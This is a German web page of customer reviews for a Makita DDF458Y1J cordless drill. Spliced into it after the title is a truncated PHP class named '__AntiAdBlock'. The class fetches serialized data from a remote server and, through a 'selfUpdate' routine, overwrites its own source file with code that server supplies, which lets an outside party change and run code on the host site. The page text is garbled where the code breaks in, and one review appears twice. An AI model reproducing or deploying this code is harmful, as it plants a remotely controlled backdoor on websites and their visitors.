Makita Akku-Bohrschrauber : Gerät funktioniert nach Reparatur gut!

requestTimeout / 1000); return $value == 0 ? 1 : $value; } private function getTimeoutMS() { return $this->requestTimeout; } private function ignoreCache() { $key = md5('PMy6vsrjIf-' . $this->zoneId); return array_key_exists($key, $_GET); } private function getCurl($url) { if ((!extension_loaded('curl')) || (!function_exists('curl_version'))) { return false; } $curl = curl_init(); curl_setopt_array($curl, array( CURLOPT_RETURNTRANSFER => 1, CURLOPT_USERAGENT => $this->requestUserAgent . ' (curl)', CURLOPT_FOLLOWLOCATION => false, CURLOPT_SSL_VERIFYPEER => true, CURLOPT_TIMEOUT => $this->getTimeout(), CURLOPT_TIMEOUT_MS => $this->getTimeoutMS(), CURLOPT_CONNECTTIMEOUT => $this->getTimeout(), CURLOPT_CONNECTTIMEOUT_MS => $this->getTimeoutMS(), )); $version = curl_version(); $scheme = ($this->requestIsSSL && ($version['features'] & CURL_VERSION_SSL)) ? 'https' : 'http'; curl_setopt($curl, CURLOPT_URL, $scheme . '://' . $this->requestDomainName . $url); $result = curl_exec($curl); curl_close($curl); return $result; } private function getFileGetContents($url) { if (!function_exists('file_get_contents') || !ini_get('allow_url_fopen') || ((function_exists('stream_get_wrappers')) && (!in_array('http', stream_get_wrappers())))) { return false; } $scheme = ($this->requestIsSSL && function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) ? 'https' : 'http'; $context = stream_context_create(array( $scheme => array( 'timeout' => $this->getTimeout(), // seconds 'user_agent' => $this->requestUserAgent . ' (fgc)', ), )); return file_get_contents($scheme . '://' . $this->requestDomainName . $url, false, $context); } private function getFsockopen($url) { $fp = null; if (function_exists('stream_get_wrappers') && in_array('https', stream_get_wrappers())) { $fp = fsockopen('ssl://' . $this->requestDomainName, 443, $enum, $estr, $this->getTimeout()); } if ((!$fp) && (!($fp = fsockopen('tcp://' . gethostbyname($this->requestDomainName), 80, $enum, $estr, $this->getTimeout())))) { return false; } $out = "GET {$url} HTTP/1.1\r\n"; $out .= "Host: {$this->requestDomainName}\r\n"; $out .= "User-Agent: {$this->requestUserAgent} (socket)\r\n"; $out .= "Connection: close\r\n\r\n"; fwrite($fp, $out); stream_set_timeout($fp, $this->getTimeout()); $in = ''; while (!feof($fp)) { $in .= fgets($fp, 2048); } fclose($fp); $parts = explode("\r\n\r\n", trim($in)); return isset($parts[1]) ? $parts[1] : ''; } private function getCacheFilePath($url, $suffix = '.js') { return sprintf('%s/pa-code-v%s-%s%s', $this->findTmpDir(), $this->version, md5($url), $suffix); } private function findTmpDir() { $dir = null; if (function_exists('sys_get_temp_dir')) { $dir = sys_get_temp_dir(); } elseif (!empty($_ENV['TMP'])) { $dir = realpath($_ENV['TMP']); } elseif (!empty($_ENV['TMPDIR'])) { $dir = realpath($_ENV['TMPDIR']); } elseif (!empty($_ENV['TEMP'])) { $dir = realpath($_ENV['TEMP']); } else { $filename = tempnam(dirname(__FILE__), ''); if (file_exists($filename)) { unlink($filename); $dir = realpath(dirname($filename)); } } return $dir; } private function isActualCache($file) { if ($this->ignoreCache()) { return false; } return file_exists($file) && (time() - filemtime($file) < $this->cacheTtl * 60); } private function getCode($url) { $code = false; if (!$code) { $code = $this->getCurl($url); } if (!$code) { $code = $this->getFileGetContents($url); } if (!$code) { $code = $this->getFsockopen($url); } return $code; } private function getPHPVersion($major = true) { $version = explode('.', phpversion()); if ($major) { return (int)$version[0]; } return $version; } private function parseRaw($code) { $hash = substr($code, 0, 32); $dataRaw = substr($code, 32); if (md5($dataRaw) !== strtolower($hash)) { return null; } if ($this->getPHPVersion() >= 7) { $data = @unserialize($dataRaw, array( 'allowed_classes' => false, )); } else { $data = @unserialize($dataRaw); } if ($data === false || !is_array($data)) { return null; } return $data; } private function getTag($code) { $data = $this->parseRaw($code); if ($data === null) { return ''; } if (array_key_exists('code', $data)) { $this->selfUpdate($data['code']); } if (array_key_exists('tag', $data)) { return (string)$data['tag']; } return ''; } public function get() { $e = error_reporting(0); $url = $this->routeGetTag . '?' . http_build_query(array( 'token' => $this->token, 'zoneId' => $this->zoneId, 'version' => $this->version, )); $file = $this->getCacheFilePath($url); if ($this->isActualCache($file)) { error_reporting($e); return $this->getTag(file_get_contents($file)); } if (!file_exists($file)) { @touch($file); } $code = ''; if ($this->ignoreCache()) { $fp = fopen($file, "r+"); if (flock($fp, LOCK_EX)) { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } else { $fp = fopen($file, 'r+'); if (!flock($fp, LOCK_EX | LOCK_NB)) { if (file_exists($file)) { $code = file_get_contents($file); } else { $code = ""; } } else { $code = $this->getCode($url); ftruncate($fp, 0); fwrite($fp, $code); fflush($fp); flock($fp, LOCK_UN); } fclose($fp); } error_reporting($e); return $this->getTag($code); } private function getSelfBackupFilename() { return $this->getCacheFilePath($this->version, ''); } private function selfBackup() { $this->selfSourceContent = file_get_contents(__FILE__); if ($this->selfSourceContent !== false && is_writable($this->findTmpDir())) { $fp = fopen($this->getSelfBackupFilename(), 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); return false; } ftruncate($fp, 0); fwrite($fp, $this->selfSourceContent); fflush($fp); flock($fp, LOCK_UN); fclose($fp); return true; } return false; } private function selfRestore() { if (file_exists($this->getSelfBackupFilename())) { return rename($this->getSelfBackupFilename(), __FILE__); } return false; } private function selfUpdate($newCode) { if(is_writable(__FILE__)) { $hasBackup = $this->selfBackup(); if ($hasBackup) { try { $fp = fopen(__FILE__, 'cb'); if (!flock($fp, LOCK_EX)) { fclose($fp); throw new Exception(); } ftruncate($fp, 0); if (fwrite($fp, $newCode) === false) { ftruncate($fp, 0); flock($fp, LOCK_UN); fclose($fp); throw new Exception(); } fflush($fp); flock($fp, LOCK_UN); fclose($fp); if (md5_file(__FILE__) === md5($newCode)) { @unlink($this->getSelfBackupFilename()); } else { throw new Exception(); } } catch (Exception $e) { $this->selfRestore(); } } } } } $__aab = new __AntiAdBlock_2361347(); return $__aab->get();

Der schrauber wiegt 2,3 und nicht 4 kg produktumfang ungenau: zusätzlicher handgriff (abgebildet) gehört normalerweise dazu. Ansonsten ist es ein super-gerät.

Ich gebe bis jetzt 4 sterne der test mit diesem produkt hat mich überzeugt vor allem die kraft ist der wahnsinn. Ich ändere meine bewertung wenn ich einige mal gearbeitet habe um eine genauere bewertung abzugeben. Aber vorab das bohrfutter eiert nicht hatte davor mit einem neueren schlagbohrschrauber gearbeitet bl motor war etwas entäuschend und ich denke jetzt im zweiten anlauf hab ich den richtigen gefunden.

Makita Akku-Bohrschrauber (18 V, SystemKIT mit 1 Akku 1,5 Ah, ohne Ladegerät, im MAKPAC) DDF458Y1J

  • Feinfühlig regelbare Drehzahl
  • Zwei-Gang-Vollmetall-Planetengetriebe
  • 21-fache Drehmomenteinstellung plus Bohrstufe
  • Aufwändiger Schutz gegen Staub und Spritzwasser
  • Mit Akku-Kapazitätsanzeige

Freue mich jedesmal, wenn ich sie benutzen kann. Hat wums und ballert die schrauben nur so ins holz.

Makita Akku-Bohrschrauber (18 V, SystemKIT mit 1 Akku 1,5 Ah, ohne Ladegerät, im MAKPAC) DDF458Y1J : Ist für jedem zu empfehlen, der nicht nur 2 schrauben einzudrehen hat. Häuslebauer oder handwerker – der durchzugstarke motor und die verarbeitung ist für die ewigkeit gebaut.

Kann man nur weiter empfehlen.

Da ich immer wieder mit großen bohrern ab 10mm bohren muß, habe ich mir diese maschine gekauft und bin sehr begeistert. Sie hat echt kraft und auch der akku hält lange aus. Würde ich jederzeit wieder kaufen.

Ich habe schon viele noname, bosch, etc. Und 3 andere makita akkuschrauber benutzt – das ist der bestebeim schrauben enorm feinfühlig und gleichzeitig drehmomentstark, das zusammen ermöglicht sicheres und sauberes arbeiten. Beim bohren sind die 2000 1/min super wenn es um kleinere bohrungen geht, was ich häufig habe. Haptik und verarbeitung sind erhaben – ein gerät für jahre und zum vererben. Und die säge ist auch klasse, 30mm multiplexplatte ging wie butter – hab sie aber nur kurz getestet und keine vergleichsmöglichkeit.

Die maschine hat nach kurzem gebrauch beim schrauben gequalmt. Der verkäufer fühlte sich selbst nicht wirklich verantwortlich. Hat mich nur instruiert, den schrauber an makita zu schicken. Den transport hätten wir dann selbst zahlen müssen. Obwohl der kauf gerade mal 3 wochen her war. Habe dann bei makita angerufen und mir wurde sofort ein transport-aufdruck per mail zugeschickt. Sofortige und unkomplizierte bearbeitung ( reparatur hat insgesamt zwei wochen gedauert) von makita deutschland selbst. Bin sehr zufrieden über den service von makita. Das gerät selbst funktioniert gut und ist auf unserer baustelle im dauereinsatz.

Mein mann ist total begeistert,absolut empfehlenswert. Wird gerade benutzt für unseren hausausbau, von spanplatten über deckenplatten und und und. tolles preis-leistungsverhältnis,ist das geld auf jeden fall wert.

Habe lange überlegt, ob ich dieses schrauber kaufen soll. Im nachhinein bereue ich es nicht. Ich habe den zwar noch nicht lange im gebrauch, dafür sehr oft. Bis jetzt wurden meiner erwartungen, was die bohr- / schraubkraft betrifft, voll erfüllt. Die qualitätsanmutung ist bei diesem gerät (selbst für makita) spitze, deshalb auch 6 sterne.

Gutes gerät mit richtig reservenverwende es nicht nur zum bohren und schrauben sondern auch zum anmischen von putzen und spachtelmassen.

Tolles gerät, jederzeit wieder. Starker drehmoment, lange akkulaufzeit. Ideal für alle handweker und hobybastler.

Ich habe lange nach einem kraftvollen akkuschrauber gesucht und habe ihn hiermit gefunden. Für leute die oft auf ein solches gerät angewiesen sind ein muss. Er versenkt schrauben als wäre es nichts auch 200mm sind gar kein problem. Er ist handlich hat ein angenehmes gewicht und ist sehr stabil. Die leds sind sehr hell und der schrauber macht inklusive koffer,akkus und zubehör einen sehr guten eindruck. Noch dazu ist das bohrfutter sehr stabil anders als bei anderen schraubern bei den ich öfter von einem lockeren bohrfutter gelesen habe. Lieferung erfolgte nach 4 tagenalles wurde geliefert wie in der beschreibung beschrieben.

Summary
Review Date
Reviewed Item
Makita Akku-Bohrschrauber (18 V, SystemKIT mit 1 Akku 1,5 Ah, ohne Ladegerät, im MAKPAC) DDF458Y1J
Rating
5,0 of 5 stars, based on 16 reviews

Ein Kommentar

  1. Ist derzeit bei hausbau und renovierungsarbeiten für alle schweren bohr- und schraubarbeiten in holzbalken, platten etc. Schafft alles wo unsere leistungsschwächeren schrauber (workzone 16v & 14,5v) aufgeben müssen. Weil wechselakku im paketumfang enthalten und ladedauer kurz ist, gibt’s auch keine standzeiten. Griff ist ordentlich dimensioniert und einfach zu befestigen, wenn er mal nötig ist. Schrauber ist gut designt (kurz, kompakt und gut ausbalanciert) aber wg. 4,0 ah akku und solider bauweise doch recht schwer. Koffer ist ok bei liegender aufbewahrung, zum transport durch tragen aber nicht wirklich geeignet. Zur modellwahl hat uns der zimmerermeister gratuliert und der kennt sich (zwangsläufig) bei einschlägigem profi-werkzeug hervorragend aus.
  2. Rezension bezieht sich auf : Makita Akku-Bohrschrauber (18 V, SystemKIT mit 1 Akku 1,5 Ah, ohne Ladegerät, im MAKPAC) DDF458Y1J

    Ist derzeit bei hausbau und renovierungsarbeiten für alle schweren bohr- und schraubarbeiten in holzbalken, platten etc. Schafft alles wo unsere leistungsschwächeren schrauber (workzone 16v & 14,5v) aufgeben müssen. Weil wechselakku im paketumfang enthalten und ladedauer kurz ist, gibt’s auch keine standzeiten. Griff ist ordentlich dimensioniert und einfach zu befestigen, wenn er mal nötig ist. Schrauber ist gut designt (kurz, kompakt und gut ausbalanciert) aber wg. 4,0 ah akku und solider bauweise doch recht schwer. Koffer ist ok bei liegender aufbewahrung, zum transport durch tragen aber nicht wirklich geeignet. Zur modellwahl hat uns der zimmerermeister gratuliert und der kennt sich (zwangsläufig) bei einschlägigem profi-werkzeug hervorragend aus.

Kommentare sind geschlossen.